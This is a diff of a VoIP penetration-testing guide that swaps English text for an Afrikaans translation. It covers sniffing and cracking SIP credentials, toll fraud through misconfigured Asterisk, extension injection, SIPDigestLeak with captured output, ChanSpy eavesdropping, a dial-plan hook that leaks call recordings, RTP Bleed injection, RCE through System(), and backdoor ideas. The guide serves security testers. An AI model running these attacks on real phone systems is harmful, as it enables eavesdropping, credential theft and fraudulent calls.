-If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.
+As jy VoIP-toerusting binne 'n **Open Wifi-netwerk** vind, kan jy **alle inligting sniff**. Verder, as jy binne 'n meer geslote netwerk is (verbind via Ethernet of beskermde Wifi), kan jy **MitM-aanvalle uitvoer soos** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) tussen die **PBX en die gateway** om die inligting te sniff.
 
-Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more.
+Onder die netwerkinligting kan jy **weblegitimasie** vind om die toerusting te bestuur, gebruiker **uitbreidings**, **gebruikersnaam**, **IP**-adresse, selfs **gehashte wagwoorde** en **RTP-pakette** wat jy kan reproduseer om die gesprek te **hör**, en meer.
 
-To get this information you could use tools such as Wireshark, tcpdump... but a **specially created tool to sniff VoIP conversations is** [**ucsniff**](https://github.com/Seabreg/ucsniff).
+Om hierdie inligting te kry, kan jy hulpmiddels soos Wireshark, tcpdump... gebruik, maar 'n **spesiaal geskepte hulpmiddel om VoIP-gesprekke te sniff** is [**ucsniff**](https://github.com/Seabreg/ucsniff).
 
 {% hint style="danger" %}
-Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\
-The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**.
+Let daarop dat as **TLS in die SIP-kommunikasie gebruik word**, sal jy nie die SIP-kommunikasie in duidelike teks kan sien nie.\
+Dieselfde sal gebeur as **SRTP** en **ZRTP** gebruik word, **RTP-pakette sal nie in duidelike teks wees nie**.
 {% endhint %}
 
-#### SIP credentials
+#### SIP-legitimasie
 
-[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**.
-
-* **`sipdump`** & **`sipcrack`,** part of **sipcrack** (`apt-get install sipcrack`): These tools can **extract** from a **pcap** the **digest authentications** within the SIP protocol and **bruteforce** them.
+[Kyk hierdie voorbeeld om 'n **SIP REGISTER-kommunikasie** beter te verstaan](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) om te leer hoe **legitimasie gestuur word**.
 
+* **`sipdump`** & **`sipcrack`,** deel van **sipcrack** (`apt-get install sipcrack`): Hierdie hulpmiddels kan **digest-autentifikasies** binne die SIP-protokol uit 'n **pcap** **onttrek** en **bruteforce**.
 ```bash
 sipdump -p net-capture.pcap sip-creds.txt
 sipcrack sip-creds.txt -w dict.txt
 ```
-
-* **`siptshar.py`, `sipdump.py`, `sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:**
-  * **SipTshark** extracts data of SIP protocol from a PCAP file.
-  * **SipDump** Extracts SIP Digest authentications from a PCAP file.
-  * **SIP Digest Crack** is a tool to crack the digest authentications within the SIP protocol.
-
+* **`siptshar.py`, `sipdump.py`, `sipcrack.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:**
+* **SipTshark** onttrek data van die SIP-protokol uit 'n PCAP-lêer.
+* **SipDump** Onttrek SIP Digest-verifikasies uit 'n PCAP-lêer.
+* **SIP Digest Crack** is 'n hulpmiddel om die digest-verifikasies binne die SIP-protokol te kraak.
 ```bash
 python3 siptshark.py -f captura3.pcap [-filter auth]
 python3 sipdump.py -f captura3.pcap -o data.txt
 python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
 ```
+#### DTMF-kodes
 
-#### DTMF codes
-
-**Not only SIP credentials** can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the **voicemail**.\
-It's possible to send these codes in **INFO SIP messages**, in **audio** or inside **RTP packets**. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:
-
+**Nie net SIP-legitimasie** kan in die netwerkverkeer gevind word nie, dit is ook moontlik om DTMF-kodes te vind wat byvoorbeeld gebruik word om toegang tot die **voicemail** te verkry.\
+Dit is moontlik om hierdie kodes in **INFO SIP-boodskappe**, in **klank** of binne **RTP-pakkies** te stuur. As die kodes binne RTP-pakkies is, kan jy daardie deel van die gesprek afsny en die multimo-hulpmiddel gebruik om hulle uit te trek:
 ```bash
 multimon -a DTMF -t wac pin.wav
 ```
+### Gratis Oproepe / Asterisk Verbindingsmisconfiguraties
 
-### Free Calls / Asterisks Connections Misconfigurations
-
-In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
-
+In Asterisk is dit moontlik om 'n verbinding toe te laat **vanaf 'n spesifieke IP-adres** of vanaf **enige IP-adres**:
 ```
 host=10.10.10.10
 host=dynamic
 ```
+As 'n IP-adres gespesifiseer word, sal die gasheer **nie nodig hê om REGISTER-aanvrae** gereeld te stuur nie (in die REGISTER-pakket word die tyd tot lewe gestuur, gewoonlik 30 minute, wat beteken dat die foon in 'n ander scenario elke 30 minute moet REGISTER). Tog sal dit oop poorte moet hê wat verbinding vanaf die VoIP-bediener toelaat om oproepe te ontvang.
 
-If an IP address is specified, the host **won't need to send REGISTER** requests every once in a while (in the REGISTER packet is sent the time to live, usually 30min, which means that in other scenario the phone will need to REGISTER every 30mins). However, it'll need to have open ports allowing connections from the VoIP server to take calls.
+Om gebruikers te definieer, kan hulle as volg gedefinieer word:
 
-To define users they can be defined as:
+* **`type=user`**: Die gebruiker kan slegs oproepe ontvang as gebruiker.
+* **`type=friend`**: Dit is moontlik om oproepe uit te voer as eweknie en om dit as gebruiker te ontvang (gebruik met uitbreidings)
+* **`type=peer`**: Dit is moontlik om oproepe as eweknie te stuur en te ontvang (SIP-trunks)
 
-* **`type=user`**: The user can only receive calls as user.
-* **`type=friend`**: It's possible to perform calls as peer and receive them as user (used with extensions)
-* **`type=peer`**: It's possible to send and receive calls as peer (SIP-trunks)
+Dit is ook moontlik om vertroue te vestig met die onveilige veranderlike:
 
-It's also possible to establish trust with the insecure variable:
-
-* **`insecure=port`**: Allows peer connections validated by IP.
-* **`insecure=invite`**: Doesn't require authentication for INVITE messages
-* **`insecure=port,invite`**: Both
+* **`insecure=port`**: Laat eweknieverbindings toe wat deur IP geverifieer word.
+* **`insecure=invite`**: Vereis nie outentifikasie vir INVITE-boodskappe nie
+* **`insecure=port,invite`**: Beide
 
 {% hint style="warning" %}
-When **`type=friend`** is used, the **value** of the **host** variable **won't be used**, so if an admin **misconfigure a SIP-trunk** using that value, **anyone will be able to connect to it**.
+Wanneer **`type=friend`** gebruik word, sal die **waarde** van die **host** veranderlike **nie gebruik word nie**, so as 'n administrateur 'n SIP-trunk **verkeerd konfigureer** deur daardie waarde te gebruik, sal **enigiemand daaraan kan koppel**.
 
-For example, this configuration would be vulnerable:\
+Byvoorbeeld, hierdie konfigurasie sou kwesbaar wees:\
 `host=10.10.10.10`\
 `insecure=port,invite`\
 `type=friend`
 {% endhint %}
 
-### Free Calls / Asterisks Context Misconfigurations
+### Gratis Oproepe / Asterisk Konteks Verkeerde Konfigurasies
 
-In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
-
-Each context is defined in the configuration file, typically in the **`extensions.conf`** file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
+In Asterisk is 'n **konteks** 'n benoemde houer of afdeling in die kiesplan wat **verwante uitbreidings, aksies en reëls groepeer**. Die kiesplan is die kernkomponent van 'n Asterisk-stelsel, aangesien dit bepaal **hoe inkomende en uitgaande oproepe hanteer en gerouteer word**. Kontekste word gebruik om die kiesplan te organiseer, toegangsbeheer te bestuur en skeiding tussen verskillende dele van die stelsel te bied.
 
+Elke konteks word in die konfigurasie-lêer gedefinieer, tipies in die **`extensions.conf`**-lêer. Kontekste word aangedui deur vierkante hakies, met die konteksnaam daarin ingesluit. Byvoorbeeld:
 ```bash
 csharpCopy code[my_context]
 ```
-
-Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
-
+Binne die konteks, definieer jy uitbreidings (patrone van gekiesde nommers) en assosieer hulle met 'n reeks aksies of toepassings. Hierdie aksies bepaal hoe die oproep verwerk word. Byvoorbeeld:
 ```scss
 [my_context]
 exten => 100,1,Answer()
 exten => 100,n,Playback(welcome)
 exten => 100,n,Hangup()
 ```
+Hierdie voorbeeld demonstreer 'n eenvoudige konteks genaamd "my\_context" met 'n uitbreiding "100". Wanneer iemand 100 kies, sal die oproep beantwoord word, 'n welkom boodskap sal gespeel word, en dan sal die oproep beëindig word.
 
-This example demonstrates a simple context called "my\_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
-
-This is **another context** that allows to **call to any other number**:
-
+Dit is **'n ander konteks** wat toelaat om **na enige ander nommer te bel**:
 ```scss
 [external]
 exten => _X.,1,Dial(SIP/trunk/${EXTEN})
 ```
-
-If the admin defines the **default context** as:
-
+As die admin die **verstek konteks** definieer as:
 ```
 [default]
 include => my_context
 include => external
 ```
-
 {% hint style="warning" %}
-Anyone will be able to use the **server to call to any other number** (and the admin of the server will pay for the call).
+Enige persoon sal in staat wees om die **bediener te gebruik om na enige ander nommer te bel** (en die administrateur van die bediener sal vir die oproep betaal).
 {% endhint %}
 
 {% hint style="danger" %}
-Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
+Verder bevat die **`sip.conf`** lêer standaard **`allowguest=true`**, dan sal **enige** aanvaller sonder **enige verifikasie** in staat wees om na enige ander nommer te bel.
 {% endhint %}
 
-*   **`sipinvite.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
+*   **`sipinvite.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite kyk of 'n **PBX-bedieners ons toelaat om oproepe sonder verifikasie te maak**. As die SIP-bediener 'n verkeerde konfigurasie het, sal dit ons toelaat om oproepe na eksterne nommers te maak. Dit kan ons ook toelaat om die oproep na 'n tweede eksterne nommer oor te dra.
 
-    For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
+Byvoorbeeld, as jou Asterisk-bediener 'n slegte konteks-konfigurasie het, kan jy INVITE-versoeke sonder outorisasie aanvaar. In hierdie geval kan 'n aanvaller oproepe maak sonder om enige gebruikersnaam/wagwoord te weet.
 
 {% code overflow="wrap" %}
 ```bash
@@ -325,22 +291,21 @@ python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444
 ```
 {% endcode %}
 
-### Free calls / Misconfigured IVRS
+### Gratis oproepe / Verkeerd gekonfigureerde IVRS
 
-IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
+IVRS staan vir **Interaktiewe Stem Antwoordstelsel**, 'n telefoonstegnologie wat gebruikers in staat stel om met 'n gerekenariseerde stelsel te kommunikeer deur middel van stem- of toets-tone insette. IVRS word gebruik om **outomatiese oproephantering**-stelsels te bou wat 'n verskeidenheid funksies bied, soos die voorsiening van inligting, roetes van oproepe en die vaslegging van gebruikersinsette.
 
-IVRS in VoIP systems typically consists of:
+IVRS in VoIP-stelsels bestaan tipies uit:
 
-1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
-2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
-3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
-4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
-5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
+1. **Stemopdragte**: Vooraf opgeneemde klankboodskappe wat gebruikers deur die IVR-menu-opsies en instruksies lei.
+2. **DTMF** (Dual-Tone Multi-Frequency) seinering: Toets-tone insette wat gegenereer word deur sleutels op die telefoon te druk, wat gebruik word om deur die IVR-menus te navigeer en insette te verskaf.
+3. **Oproeproetes**: Oproepe rig na die toepaslike bestemming, soos spesifieke departemente, agente of uitbreidings gebaseer op gebruikersinsette.
+4. **Gebruikersinsetvaslegging**: Inligting van oproepers versamel, soos rekeningnommers, saak-ID's of enige ander relevante data.
+5. **Integrasie met eksterne stelsels**: Die IVR-stelsel verbind met databasisse of ander sagtewarestelsels om toegang tot of opdatering van inligting, uitvoering van aksies of aktivering van gebeure te verkry.
 
-In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow.
-
-#### Example of vulnerable configuration
+In 'n Asterisk VoIP-stelsel kan jy 'n IVR skep deur die kiesplan (**`extensions.conf`**-lêer) en verskeie toepassings soos `Background()`, `Playback()`, `Read()` en meer te gebruik. Hierdie toepassings help jou om stemopdragte af te speel, gebruikersinsette vas te lê en die oproepvloei te beheer.
 
+#### Voorbeeld van 'n kwesbare konfigurasie
 ```scss
 exten => 0,100,Read(numbers,the_call,,,,5)
 exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
@@ -348,48 +313,40 @@ exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
 exten => 0,103,GotoIf("$[${numbers}"=""]?100)
 exten => 0,104,Dial(LOCAL/${numbers})
 ```
+Die vorige is 'n voorbeeld waar die gebruiker gevra word om **1 te druk om 'n afdeling te bel**, **2 om 'n ander een te bel**, of **die volledige uitbreiding** as hy dit weet.\
+Die kwesbaarheid is die feit dat die aangeduide **uitbreidingslengte nie nagegaan word nie, sodat 'n gebruiker 'n volledige nommer kan invoer en dit sal bel.**
 
-The previous is a example where the user is asked to **press 1 to call** a department, **2 to call** another, or **the complete extension** if he knows it.\
-The vulnerability is the fact that the indicated **extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.**
-
-### Extension Injection
-
-Using a extension such as:
+### Uitbreiding Inspruiting
 
+Deur 'n uitbreiding soos:
 ```scss
 exten => _X.,1,Dial(SIP/${EXTEN})
 ```
-
-Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen:
-
+Waar **`${EXTEN}`** die **uitbreiding** is wat sal word opgeroep, wanneer die **ext 101 ingevoer word**, is dit wat sou gebeur:
 ```scss
 exten => 101,1,Dial(SIP/101)
 ```
-
-However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result:
-
+Echter, as **`${EXTEN}`** toelaat om **meer as net nommers** in te voer (soos in ouer Asterisk-weergawes), kan 'n aanvaller **`101&SIP123123123`** invoer om die telefoonnommer 123123123 te bel. En dit sal die resultaat wees:
 ```scss
 exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
 ```
-
-Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
+Daarom sal 'n oproep na die uitbreiding **`101`** en **`123123123`** gestuur word en slegs die eerste een wat die oproep ontvang, sal gevestig word... maar as 'n aanvaller 'n **uitbreiding gebruik wat enige ooreenstemming omseil** wat uitgevoer word maar nie bestaan nie, kan hy 'n oproep slegs na die gewenste nommer **inspuit**.
 
 ## SIPDigestLeak
 
-The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.
+Die SIP Digest-lek is 'n kwesbaarheid wat 'n groot aantal SIP-telefone affekteer, insluitend beide hardeware- en sagteware-IP-telefone, sowel as telefoonadapters (VoIP na analoog). Die kwesbaarheid maak dit moontlik dat die Digest-verifikasierespons **uitgelek word**, wat bereken word uit die wagwoord. 'n **Aanval op die wagwoord in 'n aflyn-omgewing is dan moontlik** en kan die meeste wagwoorde herstel op grond van die uitdagingrespons.
 
-**[Vulnerability scenario from here**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
+**[Kwesbaarheidscenario vanaf hier**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
 
-1. An IP Phone (victim) is listening on port 5060, accepting phone calls
-2. The attacker sends an INVITE to the IP Phone
-3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)
-4. When the phone is hung up, the **victim phone sends a BYE to the attacker**
-5. The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge
-6. The **victim phone provides a response to the authentication challenge** in a second BYE
-7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
-
-* **sipdigestleak.py** from [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak exploits this vulnerability.
+1. 'n IP-telefoon (slagoffer) luister op poort 5060 en aanvaar telefoonoproepe
+2. Die aanvaller stuur 'n INVITE na die IP-telefoon
+3. Die slagoffer-telefoon begin lui en iemand neem op en hou op (omdat niemand die telefoon aan die ander kant antwoord nie)
+4. Wanneer die telefoon neergesit word, stuur die **slagoffer-telefoon 'n BYE na die aanvaller**
+5. Die **aanvaller stuur 'n 407-respons** wat **verifikasie vereis** en gee 'n verifikasie-uitdaging
+6. Die **slagoffer-telefoon verskaf 'n respons op die verifikasie-uitdaging** in 'n tweede BYE
+7. Die **aanvaller kan dan 'n brute-krag-aanval** op die uitdagingrespons uitvoer op sy plaaslike masjien (of verspreide netwerk ens.) en die wagwoord raai
 
+* **sipdigestleak.py** vanaf [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak maak gebruik van hierdie kwesbaarheid.
 ```bash
 python3 sipdigestleak.py -i 10.10.0.10
 
@@ -402,7 +359,7 @@ python3 sipdigestleak.py -i 10.10.0.10
 [<=] Response 180 Ringing
 [<=] Response 200 OK
 [=>] Request ACK
-	... waiting for BYE ...
+... waiting for BYE ...
 [<=] Received BYE
 [=>] Request 407 Proxy Authentication Required
 [<=] Received BYE with digest
@@ -410,13 +367,11 @@ python3 sipdigestleak.py -i 10.10.0.10
 
 Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
 ```
+### Klik2Bel
 
-### Click2Call
-
-Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
-
-A common Asterisk profile for this is:
+Klik2Bel stel 'n **webgebruiker** (wat byvoorbeeld belangstel in 'n produk) in staat om sy **telefoonnommer in te voer** om gebel te word. Dan sal 'n handelaar gebel word, en wanneer hy die telefoon **opneem**, sal die gebruiker **gebels en gekoppel word met die agent**.
 
+'n Gewone Asterisk-profiel hiervoor is:
 ```scss
 [web_user]
 secret = complex_password
@@ -426,11 +381,10 @@ displayconnects = yes
 read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
 write = system,call,agent,user,config,command,reporting,originate
 ```
+* Die vorige profiel laat **ENIGE IP-adres toe om te verbind** (as die wagwoord bekend is).
+* Om 'n oproep te **reël**, soos voorheen gespesifiseer, is **geen leesregte nodig** en slegs **oorsprong** in **skryf** is nodig.
 
-* The previos profile is allowing **ANY IP address to connect** (if the password is known).
-* To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed.
-
-With those permissions any IP knowing the password could connect and extract too much info, like:
+Met daardie regte kan enige IP-adres wat die wagwoord ken, verbind en te veel inligting onttrek, soos:
 
 {% code overflow="wrap" %}
 ```bash
@@ -439,17 +393,17 @@ exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecr
 ```
 {% endcode %}
 
-**More information or actions could be requested.**
+**Meer inligting of aksies kan versoek word.**
 
-### **Eavesdropping**
+### **Afluistering**
 
-In Asterisk it's possible to use the command **`ChanSpy`** indicating the **extension(s) to monitor** (or all of them) to hear conversations that are happening. This command need to be assigned to an extension.
+In Asterisk is dit moontlik om die opdrag **`ChanSpy`** te gebruik om die **uitbreiding(e) wat gemonitor moet word** (of almal) aan te dui om gesprekke te hoor wat plaasvind. Hierdie opdrag moet toegewys word aan 'n uitbreiding.
 
-For example, **`exten => 333,1,ChanSpy('all',qb)`** indicate that if you **call** the **extension 333**, it will **monitor** **`all`** the extensions, **start listening** whenever a new conversation start (**`b`**) in quiet mode (**`q`**) as we don't want to interact on it. You could go from one conversation happening to another pressing **`*`**, or marking the extension number.
+Byvoorbeeld, **`exten => 333,1,ChanSpy('all',qb)`** dui aan dat as jy die **uitbreiding 333** **bel**, dit sal **monitor** **`all`** die uitbreidings, **begin luister** wanneer 'n nuwe gesprek begin (**`b`**) in stilte modus (**`q`**) aangesien ons nie daarmee wil interaksie hê nie. Jy kan van die een gesprek na die ander gaan deur op **`*`** te druk, of deur die uitbreidingsnommer te merk.
 
-It's also possible tu use **`ExtenSpy`** to monitor one extension only.
+Dit is ook moontlik om **`ExtenSpy`** te gebruik om slegs een uitbreiding te monitor.
 
-Instead of listening the conversations, it's possible to **record them in files** using an extension such as:
+In plaas van om die gesprekke te beluister, is dit moontlik om hulle in lêers op te neem deur 'n uitbreiding soos die volgende te gebruik:
 
 {% code overflow="wrap" %}
 ```scss
@@ -459,104 +413,92 @@ exten => _X.,2,MixMonitor(${NAME})
 ```
 {% endcode %}
 
-Calls will be saved in **`/tmp`**.
-
-You could also even make Asterisk **execute a script that will leak the call** when it's closed.
+Oproepe sal gestoor word in **`/tmp`**.
 
+Jy kan selfs Asterisk laat **'n skripsie uitvoer wat die oproep sal uitlek** wanneer dit gesluit word.
 ```scss
 exten => h,1,System(/tmp/leak_conv.sh &)
 ```
-
 ### RTCPBleed
 
-**RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.
+**RTCPBleed** is 'n groot veiligheidsprobleem wat Asterisk-gebaseerde VoIP-bedieners affekteer (gepubliseer in 2017). Die kwesbaarheid maak dit moontlik vir **RTP (Real Time Protocol) verkeer**, wat VoIP-gesprekke dra, om deur enigiemand op die internet **onderskep en omgelei te word**. Dit gebeur omdat RTP-verkeer verificasie omseil wanneer dit deur NAT (Network Address Translation) vuurmuure navigeer.
 
-RTP proxies try to address **NAT limitations** affecting RTC systems by proxying RTP streams between two or more parties. When NAT is in place, the RTP proxy software often cannot rely on the RTP IP and port information retrieved through signalling (e.g. SIP). Therefore, a number of RTP proxies have implemented a mechanism where such **IP and port tuplet is learned automatically**. This is often done by by inspecting incoming RTP traffic and marking the source IP and port for any incoming RTP traffic as the one that should be responded to. This mechanism, which may be called "learning mode", **does not make use of any sort of authentication**. Therefore **attackers** may **send RTP traffic to the RTP proxy** and receive the proxied RTP traffic meant to be for the caller or callee of an ongoing RTP stream. We call this vulnerability RTP Bleed because it allows attackers to receive RTP media streams meant to be sent to legitimate users.
+RTP-proksi's probeer **NAT-beperkings** wat RTC-stelsels affekteer, aanspreek deur RTP-strome tussen twee of meer partye te proksiëer. Wanneer NAT in plek is, kan die RTP-proksi sagteware dikwels nie staatmaak op die RTP-IP- en poortinligting wat deur signalering (bv. SIP) verkry word nie. Daarom het 'n aantal RTP-proksi's 'n meganisme geïmplementeer waar die **IP- en poorttuplet outomaties geleer word**. Dit word dikwels gedoen deur inkomende RTP-verkeer te ondersoek en die bron-IP en -poort vir enige inkomende RTP-verkeer te merk as die een waarop geantwoord moet word. Hierdie meganisme, wat "leermodus" genoem kan word, **maak geen gebruik van enige vorm van verifikasie nie**. Daarom kan **aanvallers** RTP-verkeer na die RTP-proksi stuur en die geproksiëerde RTP-verkeer ontvang wat bedoel is vir die oproeper of ontvanger van 'n aan die gang RTP-stroom. Ons noem hierdie kwesbaarheid RTP Bleed omdat dit aanvallers in staat stel om RTP-media-strome te ontvang wat bedoel is om na wettige gebruikers gestuur te word.
 
-Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.
+'n Ander interessante gedrag van RTP-proksi's en RTP-stapel is dat hulle soms, **selfs as hulle nie vatbaar is vir RTP Bleed nie**, RTP-pakette van enige bron sal **aanvaar, deurstuur en/of verwerk**. Daarom kan aanvallers RTP-pakette stuur wat dit vir hulle moontlik maak om hul media in te spuit in plaas van die wettige een. Ons noem hierdie aanval RTP-injectie omdat dit die inspuiting van onwettige RTP-pakette in bestaande RTP-strome moontlik maak. Hierdie kwesbaarheid kan in beide RTP-proksi's en eindpunte gevind word.
 
-Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls.
+Asterisk en FreePBX het tradisioneel die **`NAT=yes`-instelling** gebruik, wat RTP-verkeer in staat stel om verifikasie te omseil, wat moontlik lei tot geen klank of eenrigtingklank in oproepe.
 
-For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
-
-* **`rtpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
+Vir meer inligting, besoek [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
 
+* **`rtpbleed.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Dit ontdek die RTP Bleed-kwesbaarheid deur RTP-strome te stuur.
 ```bash
 python3 rtpbleed.py -i 10.10.0.10
 ```
-
-* **`rtcpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
-
+* **`rtcpbleed.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Dit ontdek die RTP Bloei kwesbaarheid deur RTP strome te stuur.
 ```bash
 python3 rtcpbleed.py -i 10.10.0.10
 ```
-
-* **`rtpbleedflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams
-
+* **`rtpbleedflood.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Exploiteer die RTP Bleed kwesbaarheid deur RTP strome te stuur.
 ```bash
 python3 rtpbleedflood.py -i 10.10.0.10 -p 10070 -v
 ```
-
-* **`rtpbleedinject.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams (from an audio file)
-
+* **`rtpbleedinject.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Exploiteer die RTP Bleed kwesbaarheid deur RTP-strome te stuur (vanuit 'n klanklêer)
 ```bash
 python3 rtpbleedinject.py -i 10.10.0.10 -p 10070 -f audio.wav
 ```
-
 ### RCE
 
-In Asterisk you somehow manage to be able to **add extension rules and reload them** (for example by compromising a vulnerable web manager server), it's possible to get RCE using the **`System`** command.
-
+In Asterisk slaag jy op een of ander manier daarin om **uitbreidingsreëls by te voeg en hulle te herlaai** (byvoorbeeld deur 'n kwesbare webbestuurderbediener te kompromitteer), is dit moontlik om RCE te kry deur die **`System`**-opdrag te gebruik.
 ```scss
 same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
 ```
-
-There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary.
+Daar is 'n bevel genaamd **`Shell`** wat gebruik kan word **in plaas van `System`** om stelselopdragte uit te voer indien nodig.
 
 {% hint style="warning" %}
-If the server is **disallowing the use of certain characters** in the **`System`** command (like in Elastix), check if the web server allows to **create files somehow inside the system** (like in Elastix or trixbox), and use it to **create a backdoor script** and then use **`System`** to **execute** that **script**.
+As die bediener die gebruik van sekere karakters in die **`System`**-opdrag verbied (soos in Elastix), kyk of die webbediener toelaat om op een of ander manier lêers binne die stelsel te **skep** (soos in Elastix of trixbox), en gebruik dit om 'n agterdeur-skripsie te **skep** en gebruik dan **`System`** om daardie **skripsie** uit te voer.
 {% endhint %}
 
-#### Interesting local files and permissions
+#### Interessante plaaslike lêers en regte
 
-* **`sip.conf`** -> Contains the password of SIP users.
-* If the **Asterisk server is running as root**, you could compromise root
-* **mysql root user** might **doesn't have any password**.
-  * this could be used to create a new mysql user as backdoor
+* **`sip.conf`** -> Bevat die wagwoord van SIP-gebruikers.
+* As die **Asterisk-bedieners as root uitgevoer word**, kan jy root kompromitteer.
+* Die **mysql root-gebruiker** het moontlik **geen wagwoord nie**.
+* Dit kan gebruik word om 'n nuwe mysql-gebruiker as agterdeur te skep.
 * **`FreePBX`**
-  * **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX)
-  * **`FreePBX.conf`** -> Constains the password of the user FreePBXuser used to access the database
-    * this could be used to create a new mysql user as backdoor
+* **`amportal.conf`** -> Bevat die wagwoord van die webpaneel-administrateur (FreePBX)
+* **`FreePBX.conf`** -> Bevat die wagwoord van die gebruiker FreePBXuser wat gebruik word om toegang tot die databasis te verkry
+* Dit kan gebruik word om 'n nuwe mysql-gebruiker as agterdeur te skep.
 * **`Elastix`**
